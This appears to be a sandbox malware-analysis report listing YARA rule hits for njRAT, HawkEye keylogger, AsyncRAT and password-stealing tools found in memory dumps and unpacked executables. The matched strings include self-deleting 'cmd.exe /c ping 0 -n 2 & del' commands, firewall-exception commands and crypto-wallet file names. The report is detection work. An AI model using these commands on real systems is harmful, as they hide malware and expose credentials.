00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x1e0e:$reg: SEE_MASK_NOZONECHECKS 0x1ee6:$msg: Execute ERROR 0x1f42:$msg: Execute ERROR 0x1dd0:$ping: cmd.exe /c ping 0 -n 2 & del
00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x149dd:$a1: netsh firewall add allowedprogram 0x14b6d:$b1: [TAP] 0x13927:$b2: & exit 0x14963:$b2: & exit 0x14931:$c1: md.exe /k ping 0 & del
00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf46d:$a1: netsh firewall add allowedprogram 0xf5fd:$b1: [TAP] 0xe3b7:$b2: & exit 0xf3f3:$b2: & exit 0xf3c1:$c1: md.exe /k ping 0 & del
00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b6e8:$key: HawkEyeKeylogger 0x7d8e2:$salt: 099u787978786 0x7bd11:$string1: HawkEye_Keylogger 0x7cb50:$string1: HawkEye_Keylogger 0x7d842:$string1: HawkEye_Keylogger 0x7c0e6:$string2: holdermail.txt 0x7c106:$string2: holdermail.txt 0x7c028:$string3: wallet.dat 0x7c040:$string3: wallet.dat 0x7c056:$string3: wallet.dat 0x7d424:$string4: Keylog Records 0x7d73c:$string4: Keylog Records 0x7d93a:$string5: do not script --> 0x7b6d0:$string6: \pidloc.txt 0x7b72a:$string7: BSPLIT 0x7b73a:$string7: BSPLIT
0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd69:$hawkstr1: HawkEye Keylogger 0x7cb96:$hawkstr1: HawkEye Keylogger 0x7cec5:$hawkstr1: HawkEye Keylogger 0x7d020:$hawkstr1: HawkEye Keylogger 0x7d183:$hawkstr1: HawkEye Keylogger 0x7d3fc:$hawkstr1: HawkEye Keylogger 0x7b8db:$hawkstr2: Dear HawkEye Customers! 0x7cf18:$hawkstr2: Dear HawkEye Customers! 0x7d06f:$hawkstr2: Dear HawkEye Customers! 0x7d1d6:$hawkstr2: Dear HawkEye Customers! 0x7b9fc:$hawkstr3: HawkEye Logger Details:
0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf46d:$a1: netsh firewall add allowedprogram 0xf5fd:$b1: [TAP] 0xe3b7:$b2: & exit 0xf3f3:$b2: & exit 0xf3c1:$c1: md.exe /k ping 0 & del
00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000000.00000002.374043001.000001B866BB2000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x684:$: RWcVFBQU
00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x40108:$hawkstr1: HawkEye Keylogger 0x422c8:$hawkstr1: HawkEye Keylogger 0x42660:$hawkstr1: HawkEye Keylogger 0x47a54:$hawkstr1: HawkEye Keylogger 0x3fb54:$hawkstr2: Dear HawkEye Customers! 0x4232c:$hawkstr2: Dear HawkEye Customers! 0x426c4:$hawkstr2: Dear HawkEye Customers! 0x3fc86:$hawkstr3: HawkEye Logger Details:
00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0xdc670:$key: HawkEyeKeylogger 0xde86a:$salt: 099u787978786 0xdcc99:$string1: HawkEye_Keylogger 0xddad8:$string1: HawkEye_Keylogger 0xde7ca:$string1: HawkEye_Keylogger 0xdd06e:$string2: holdermail.txt 0xdd08e:$string2: holdermail.txt 0xdcfb0:$string3: wallet.dat 0xdcfc8:$string3: wallet.dat 0xdcfde:$string3: wallet.dat 0xde3ac:$string4: Keylog Records 0xde6c4:$string4: Keylog Records 0xde8c2:$string5: do not script --> 0xdc658:$string6: \pidloc.txt 0xdc6b2:$string7: BSPLIT 0xdc6c2:$string7: BSPLIT
00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0xdccf1:$hawkstr1: HawkEye Keylogger 0xddb1e:$hawkstr1: HawkEye Keylogger 0xdde4d:$hawkstr1: HawkEye Keylogger 0xddfa8:$hawkstr1: HawkEye Keylogger 0xde10b:$hawkstr1: HawkEye Keylogger 0xde384:$hawkstr1: HawkEye Keylogger 0xdc863:$hawkstr2: Dear HawkEye Customers! 0xddea0:$hawkstr2: Dear HawkEye Customers! 0xddff7:$hawkstr2: Dear HawkEye Customers! 0xde15e:$hawkstr2: Dear HawkEye Customers! 0xdc984:$hawkstr3: HawkEye Logger Details:
00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf46d:$a1: netsh firewall add allowedprogram 0xf5fd:$b1: [TAP] 0xe3b7:$b2: & exit 0xf3f3:$b2: & exit 0xf3c1:$c1: md.exe /k ping 0 & del
00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x47de:$a1: netsh firewall add allowedprogram 0x47ae:$a2: SEE_MASK_NOZONECHECKS 0x4a58:$b1: [TAP] 0x4770:$c3: cmd.exe /c ping
00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x47ae:$reg: SEE_MASK_NOZONECHECKS 0x4886:$msg: Execute ERROR 0x48e2:$msg: Execute ERROR 0x4770:$ping: cmd.exe /c ping 0 -n 2 & del
00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b6e8:$key: HawkEyeKeylogger 0x7d8e2:$salt: 099u787978786 0x7bd11:$string1: HawkEye_Keylogger 0x7cb50:$string1: HawkEye_Keylogger 0x7d842:$string1: HawkEye_Keylogger 0x7c0e6:$string2: holdermail.txt 0x7c106:$string2: holdermail.txt 0x7c028:$string3: wallet.dat 0x7c040:$string3: wallet.dat 0x7c056:$string3: wallet.dat 0x7d424:$string4: Keylog Records 0x7d73c:$string4: Keylog Records 0x7d93a:$string5: do not script --> 0x7b6d0:$string6: \pidloc.txt 0x7b72a:$string7: BSPLIT 0x7b73a:$string7: BSPLIT
0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd69:$hawkstr1: HawkEye Keylogger 0x7cb96:$hawkstr1: HawkEye Keylogger 0x7cec5:$hawkstr1: HawkEye Keylogger 0x7d020:$hawkstr1: HawkEye Keylogger 0x7d183:$hawkstr1: HawkEye Keylogger 0x7d3fc:$hawkstr1: HawkEye Keylogger 0x7b8db:$hawkstr2: Dear HawkEye Customers! 0x7cf18:$hawkstr2: Dear HawkEye Customers! 0x7d06f:$hawkstr2: Dear HawkEye Customers! 0x7d1d6:$hawkstr2: Dear HawkEye Customers! 0x7b9fc:$hawkstr3: HawkEye Logger Details:
00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe9dd:$a1: netsh firewall add allowedprogram 0xeb6d:$b1: [TAP] 0xd927:$b2: & exit 0xe963:$b2: & exit 0xe931:$c1: md.exe /k ping 0 & del
00000000.00000003.341582297.000001B865D3F000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x3c4a2:$: VFZxUUFBT
00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
0000000D.00000002.616200946.0000000008100000.00000004.00000001.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
0000000D.00000002.616252308.0000000008150000.00000004.00000001.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x41ece:$a1: netsh firewall add allowedprogram 0x41e9e:$a2: SEE_MASK_NOZONECHECKS 0x42148:$b1: [TAP] 0x41e60:$c3: cmd.exe /c ping
00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x41e9e:$reg: SEE_MASK_NOZONECHECKS 0x41f76:$msg: Execute ERROR 0x41fd2:$msg: Execute ERROR 0x41e60:$ping: cmd.exe /c ping 0 -n 2 & del
00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9e:$a1: netsh firewall add allowedprogram 0x4b6e:$a2: SEE_MASK_NOZONECHECKS 0x4e18:$b1: [TAP] 0x4b30:$c3: cmd.exe /c ping
00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6e:$reg: SEE_MASK_NOZONECHECKS 0x4c46:$msg: Execute ERROR 0x4ca2:$msg: Execute ERROR 0x4b30:$ping: cmd.exe /c ping 0 -n 2 & del
Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: tmpFB21.tmp.exe PID: 4928	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: tmpFB21.tmp.exe PID: 4928	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: tmpFB21.tmp.exe PID: 4928	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: servieda.exe PID: 5648	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: vbc.exe PID: 1428	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: vbc.exe PID: 5824	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: wscript.exe PID: 5972	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x80dabf:$: VFZxUUFBT 0x11c3c43:$: VFZxUUFBT 0xe0393d:$: RWcVFBQU
Process Memory Space: wscript.exe PID: 5972	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: tmp87E4.tmp.exe PID: 5036	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Tmp.exe PID: 240	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: pgr.exe PID: 1068	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: pgr.exe PID: 1068	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: pgr.exe PID: 1068	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: pgr.exe PID: 1068	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 134 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.3.wscript.exe.1b86717d130.5.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x2f30:$x1: cmd.exe /c ping 0 -n 2 & del " 0x3088:$s3: Executed As 0x306a:$s6: Download ERROR
0.3.wscript.exe.1b86717d130.5.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.3.wscript.exe.1b86717d130.5.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x2f9e:$a1: netsh firewall add allowedprogram 0x2f6e:$a2: SEE_MASK_NOZONECHECKS 0x3218:$b1: [TAP] 0x2f30:$c3: cmd.exe /c ping
0.3.wscript.exe.1b86717d130.5.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x2f6e:$reg: SEE_MASK_NOZONECHECKS 0x3046:$msg: Execute ERROR 0x30a2:$msg: Execute ERROR 0x2f30:$ping: cmd.exe /c ping 0 -n 2 & del
0.3.wscript.exe.1b8660a7cb0.0.unpack	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xbf24:$s1: wireshark 0xbeee:$s2: procexp
0.3.wscript.exe.1b8660a7cb0.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.3.wscript.exe.1b8660a7cb0.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xd86d:$a1: netsh firewall add allowedprogram 0xd9fd:$b1: [TAP] 0xc7b7:$b2: & exit 0xd7f3:$b2: & exit 0xd7c1:$c1: md.exe /k ping 0 & del
0.3.wscript.exe.1b8660a7cb0.0.raw.unpack	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xdd24:$s1: wireshark 0xdcee:$s2: procexp
0.3.wscript.exe.1b8660a7cb0.0.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.3.wscript.exe.1b8660a7cb0.0.raw.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf66d:$a1: netsh firewall add allowedprogram 0xf7fd:$b1: [TAP] 0xe5b7:$b2: & exit 0xf5f3:$b2: & exit 0xf5c1:$c1: md.exe /k ping 0 & del
0.3.wscript.exe.1b8660a7cb0.1.raw.unpack	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xdd24:$s1: wireshark 0xdcee:$s2: procexp
0.3.wscript.exe.1b8660a7cb0.1.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.3.wscript.exe.1b8660a7cb0.1.raw.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf66d:$a1: netsh firewall add allowedprogram 0xf7fd:$b1: [TAP] 0xe5b7:$b2: & exit 0xf5f3:$b2: & exit 0xf5c1:$c1: md.exe /k ping 0 & del
8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xdd24:$s1: wireshark 0xdcee:$s2: procexp
8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf66d:$a1: netsh firewall add allowedprogram 0xf7fd:$b1: [TAP] 0xe5b7:$b2: & exit 0xf5f3:$b2: & exit 0xf5c1:$c1: md.exe /k ping 0 & del
13.2.tmpFB21.tmp.exe.8a0000.0.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8e8:$key: HawkEyeKeylogger 0x7dae2:$salt: 099u787978786 0x7bf11:$string1: HawkEye_Keylogger 0x7cd50:$string1: HawkEye_Keylogger 0x7da42:$string1: HawkEye_Keylogger 0x7c2e6:$string2: holdermail.txt 0x7c306:$string2: holdermail.txt 0x7c228:$string3: wallet.dat 0x7c240:$string3: wallet.dat 0x7c256:$string3: wallet.dat 0x7d624:$string4: Keylog Records 0x7d93c:$string4: Keylog Records 0x7db3a:$string5: do not script --> 0x7b8d0:$string6: \pidloc.txt 0x7b92a:$string7: BSPLIT 0x7b93a:$string7: BSPLIT
13.2.tmpFB21.tmp.exe.8a0000.0.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
13.2.tmpFB21.tmp.exe.8a0000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.2.tmpFB21.tmp.exe.8a0000.0.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
13.2.tmpFB21.tmp.exe.8a0000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.2.tmpFB21.tmp.exe.8a0000.0.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf69:$hawkstr1: HawkEye Keylogger 0x7cd96:$hawkstr1: HawkEye Keylogger 0x7d0c5:$hawkstr1: HawkEye Keylogger 0x7d220:$hawkstr1: HawkEye Keylogger 0x7d383:$hawkstr1: HawkEye Keylogger 0x7d5fc:$hawkstr1: HawkEye Keylogger 0x7badb:$hawkstr2: Dear HawkEye Customers! 0x7d118:$hawkstr2: Dear HawkEye Customers! 0x7d26f:$hawkstr2: Dear HawkEye Customers! 0x7d3d6:$hawkstr2: Dear HawkEye Customers! 0x7bbfc:$hawkstr3: HawkEye Logger Details:
13.2.tmpFB21.tmp.exe.4040020.7.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
1.0.Tmp.exe.1d0000.0.unpack	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xdd24:$s1: wireshark 0xdcee:$s2: procexp
1.0.Tmp.exe.1d0000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
1.0.Tmp.exe.1d0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf66d:$a1: netsh firewall add allowedprogram 0xf7fd:$b1: [TAP] 0xe5b7:$b2: & exit 0xf5f3:$b2: & exit 0xf5c1:$c1: md.exe /k ping 0 & del
0.3.wscript.exe.1b86717d130.5.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.3.wscript.exe.1b86717d130.5.raw.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9e:$a1: netsh firewall add allowedprogram 0x4d6e:$a2: SEE_MASK_NOZONECHECKS 0x5018:$b1: [TAP] 0x4d30:$c3: cmd.exe /c ping
0.3.wscript.exe.1b86717d130.5.raw.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6e:$reg: SEE_MASK_NOZONECHECKS 0x4e46:$msg: Execute ERROR 0x4ea2:$msg: Execute ERROR 0x4d30:$ping: cmd.exe /c ping 0 -n 2 & del
0.3.wscript.exe.1b8660a7cb0.1.unpack	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xbf24:$s1: wireshark 0xbeee:$s2: procexp
0.3.wscript.exe.1b8660a7cb0.1.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.3.wscript.exe.1b8660a7cb0.1.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xd86d:$a1: netsh firewall add allowedprogram 0xd9fd:$b1: [TAP] 0xc7b7:$b2: & exit 0xd7f3:$b2: & exit 0xd7c1:$c1: md.exe /k ping 0 & del
13.2.tmpFB21.tmp.exe.8150000.11.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
2.2.pgr.exe.3a3fd88.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8e8:$key: HawkEyeKeylogger 0x7dae2:$salt: 099u787978786 0x7bf11:$string1: HawkEye_Keylogger 0x7cd50:$string1: HawkEye_Keylogger 0x7da42:$string1: HawkEye_Keylogger 0x7c2e6:$string2: holdermail.txt 0x7c306:$string2: holdermail.txt 0x7c228:$string3: wallet.dat 0x7c240:$string3: wallet.dat 0x7c256:$string3: wallet.dat 0x7d624:$string4: Keylog Records 0x7d93c:$string4: Keylog Records 0x7db3a:$string5: do not script --> 0x7b8d0:$string6: \pidloc.txt 0x7b92a:$string7: BSPLIT 0x7b93a:$string7: BSPLIT
